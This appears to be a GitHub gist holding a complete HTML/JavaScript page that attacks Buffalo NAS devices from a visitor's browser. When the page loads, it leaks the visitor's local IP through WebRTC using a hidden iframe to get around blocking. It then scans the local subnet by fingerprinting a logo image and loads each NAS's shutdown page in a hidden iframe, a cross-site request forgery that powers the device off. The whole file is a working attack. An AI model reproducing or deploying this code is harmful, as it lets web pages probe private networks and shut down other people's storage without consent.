Created
January 24, 2016 03:31
-
-
Save venoms/5b5437e25e0bf3b49d0a to your computer and use it in GitHub Desktop.
scans for, and shuts down buffalo NAS-s in the local network
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <head> | |
| <title>buffalo nas shutdown</title> | |
| </head> | |
| <body> | |
| <iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe> | |
| <div id="output"></div> | |
| <script> | |
| var output = document.getElementById("output"); | |
| //stolen from https://github.com/diafygi/webrtc-ips | |
| //under the MIT license | |
| //get the IP addresses associated with an account | |
| function getIPs(callback){ | |
| var ip_dups = {}; | |
| //compatibility for firefox and chrome | |
| var RTCPeerConnection = window.RTCPeerConnection | |
| || window.mozRTCPeerConnection | |
| || window.webkitRTCPeerConnection; | |
| var useWebKit = !!window.webkitRTCPeerConnection; | |
| //bypass naive webrtc blocking using an iframe | |
| if(!RTCPeerConnection){ | |
| //NOTE: you need to have an iframe in the page right above the script tag | |
| // | |
| //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe> | |
| //<script>...getIPs called in here... | |
| // | |
| var win = iframe.contentWindow; | |
| RTCPeerConnection = win.RTCPeerConnection | |
| || win.mozRTCPeerConnection | |
| || win.webkitRTCPeerConnection; | |
| useWebKit = !!win.webkitRTCPeerConnection; | |
| } | |
| //minimal requirements for data connection | |
| var mediaConstraints = { | |
| optional: [{RtpDataChannels: true}] | |
| }; | |
| var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]}; | |
| //construct a new RTCPeerConnection | |
| var pc = new RTCPeerConnection(servers, mediaConstraints); | |
| function handleCandidate(candidate){ | |
| //match just the IP address | |
| var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/ | |
| var ip_addr = ip_regex.exec(candidate)[1]; | |
| //remove duplicates | |
| if(ip_dups[ip_addr] === undefined) | |
| callback(ip_addr); | |
| ip_dups[ip_addr] = true; | |
| } | |
| //listen for candidate events | |
| pc.onicecandidate = function(ice){ | |
| //skip non-candidate events | |
| if(ice.candidate) | |
| handleCandidate(ice.candidate.candidate); | |
| }; | |
| //create a bogus data channel | |
| pc.createDataChannel(""); | |
| //create an offer sdp | |
| pc.createOffer(function(result){ | |
| //trigger the stun server request | |
| pc.setLocalDescription(result, function(){}, function(){}); | |
| }, function(){}); | |
| //wait for a while to let everything done | |
| setTimeout(function(){ | |
| //read candidate info from local description | |
| var lines = pc.localDescription.sdp.split('\n'); | |
| lines.forEach(function(line){ | |
| if(line.indexOf('a=candidate:') === 0) | |
| handleCandidate(line); | |
| }); | |
| }, 1000); | |
| } | |
| function foundNAS(ip) { | |
| output.innerText += "Bingo! NAS at " + ip + "\n"; | |
| var i = document.createElement("iframe"); | |
| i.setAttribute("style", "display:none"); | |
| i.setAttribute("src", "http://" + ip + "/shutdown.html"); | |
| output.innerText += "Shutting it down now... This will fail if you're not logged in." | |
| document.body.appendChild(i); | |
| } | |
| var groupSize = 50; | |
| //Using STUN, we locate the local ip address of the user | |
| // we make sensible guesses that the NAS is in the same simple local network | |
| getIPs(function(ip){ | |
| //local IPs | |
| if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)) { | |
| output.innerText += "Found IP " + ip + "\n" | |
| // shotgun this ip | |
| var pre = /^([\d\.]+\.)\d+$/.exec(ip)[1]; | |
| output.innerText += "Searching " + pre + "*\n" | |
| var i = 0, ed = 0; | |
| //try a block of 50 NAS guesses | |
| var sweep = function() { | |
| ed = i + groupSize | |
| var donect = 0; | |
| var done = function() { | |
| donect += 1; | |
| if (i > 253) return; | |
| if (donect == groupSize) sweep(); | |
| console.log(i); | |
| } | |
| output.innerText += "Searching " + pre + i + "-" + ed + "\n" | |
| for(;i<ed;i++) { | |
| var el = document.createElement("img"); | |
| var n = i; | |
| el.setAttribute("style", "width:1em; height:1em;display:inline;border:1px solid red"); | |
| // logo loaded; must be NAS | |
| el.addEventListener("load", function(){ | |
| done(); | |
| this.setAttribute("style", "display:block"); | |
| foundNAS(/(?:\d+\.){3}.\d+/g.exec(this.src)[0]); | |
| }); | |
| // logo did not load; not NAS | |
| el.addEventListener("error", function() { | |
| done(); | |
| this.parentNode.removeChild(this); | |
| }); | |
| el.setAttribute("src", "http://" + pre + i + "/img/common/forlink/header-logo.gif"); | |
| document.body.appendChild(el); | |
| } | |
| } | |
| sweep(); | |
| } | |
| }); | |
| </script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment